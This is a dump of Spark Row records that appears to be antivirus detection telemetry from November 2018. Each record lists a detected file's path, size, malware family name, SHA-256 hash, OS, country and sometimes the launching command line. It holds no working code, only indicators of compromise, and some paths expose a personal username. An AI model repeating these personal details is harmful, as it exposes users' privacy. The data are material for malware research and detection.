  Row(detection=Row(filename='avscan-20181102-052119-198c0507', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052119-198C0507', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061022-f3b8ae92', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061022-F3B8AE92', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061915-31b7c9f8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061915-31B7C9F8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053702-4bea9c79', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053702-4BEA9C79', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055443-c4554efe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055443-C4554EFE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050616-ff2c3b14', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050616-FF2C3B14', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T08:14:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050602-f6bdb330', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050602-F6BDB330', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051727-8f2c637c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051727-8F2C637C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050847-591a2c68', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050847-591A2C68', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T09:12:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061507-9dbe11d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061507-9DBE11D0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062441-f3cc86ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062441-F3CC86EF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060159-c822536d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060159-C822536D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060743-94f20517', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060743-94F20517', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T11:07:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054353-40cb70b0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054353-40CB70B0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T11:07:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T00:52:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053720-564a97bf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053720-564A97BF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050813-44cbbabe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050813-44CBBABE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053839-85bb84d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053839-85BB84D2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053330-cd0a953a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053330-CD0A953A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051441-2c9c31af', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051441-2C9C31AF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060745-966f80a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060745-966F80A1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054105-dc3ab988', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054105-DC3AB988', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-143305-7bf36c58', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-142842-4F9964B3\\AVSCAN-20181101-143305-7BF36C58', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:33:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155437-359f2844', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-155204-205028ED\\AVSCAN-20181101-155437-359F2844', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:13:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh7be9', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH7BE9', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:43:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauclt.exe', filepath='C:\\Windows\\System32\\wuauclt.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='3bbcddfbcb55c2d2e07841ad444d207fef8aad19af1ad587835534f57b500ec6', metadata=Row(cmdline='-k netsvcs', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T11:32:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='keluar.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\BPJS KESEHATAN\\2015\\OPR Keluar\\Keluar.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141635-6a966d57', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d93eb456\\AVSCAN-20181101-140520-1BEBFBF6\\AVSCAN-20181101-141635-6A966D57', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:16:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T03:25:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T06:43:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:37:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-102125-45ef866a', filepath='C:\\Dokumente und Einstellungen\\All Users\\Anwendungsdaten\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-095824-1F436122\\AVSCAN-20181101-102125-45EF866A', filesize=512000, name='TR/Crypt.XPACK.136118.#M1.#R1'), hash='4bb00be774bac8316365d4205a29f36b4bad640a40682c7a7d4d770688ea654d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154540-59660d3d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154540-59660D3D', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:45:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aidl.exe', filepath='F:\\FILES 1\\Lenovo_K10a40\\Lenovo_K10a40_S230_MT6735_20170517\\K10a40_S230_MT6735_20170517\\SN Write Tool v2.1504.00\\Android\\aidl.exe', filesize=1472000, name='W32/Sality.AT.#M1.#R1'), hash='257c066aa01d49a5831255dd853cdd0d0a24b4c08c3f5a3dc7eb5208bffc77a5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T10:24:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:18:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='epsdneul.exe', filepath='D:\\SERVER_BENGKEL\\1.ADMBENG\\EPSON\\Apps\\DownloadNavigator\\EPSDNEUL.EXE', filesize=1232000, name='W32/Sality.AT.#M1.#R1'), hash='378e3c19e7cfcc8a5ea55ba2e8bf7e459b39eb818e4f7beb309c236a4b0c1f59', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:03:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp5180272\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Baixaki_java-se-development-kit_2459879894.exe', parentsize=2202824, timestamp='2018-11-01T01:58:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-21-27-36.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-25T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T14:34:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='102613014533326.acv', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\102613014533326.acv', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:26:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105937-4f2973dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_735ad0b6\\AVSCAN-20181101-105713-3526A361\\AVSCAN-20181101-105937-4F2973DD', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:59:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:31:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:51:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160133-f9ea3f93', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160133-F9EA3F93', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:01:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered neril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered neril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c7d7d2b9f9b9bc1a730902c629ee706043e35f9d31f3ef5845c0736e8600226b', metadata=Row(cmdline='{BB8E2B75-94FB-4794-89DE-FA6C1DC76DF4} S-1-5-21-1159229983-551769872-3216915100-1000:PC1-PC\\\\\\\\PC1:Interactive:Highest[1]', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=192000, timestamp='2018-11-01T19:12:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='winword.exe', filepath='C:\\Program Files\\Microsoft Office\\OFFICE11\\WINWORD.EXE', filesize=12380000, name='W32/Sality.AG.#M1.#R1'), hash='6fcaf2ea71bca11d896c0810d2a5c69b029235c8a670f929e536077214243226', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T09:40:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T10:28:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tzpefjw.vgv', filepath='C:\\Windows\\System32\\tzpefjw.vgv', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline='tzpefjw.vgv,verrf', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T14:59:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T07:58:54Z'), dt=datetime.date(2018, 11, 1)),
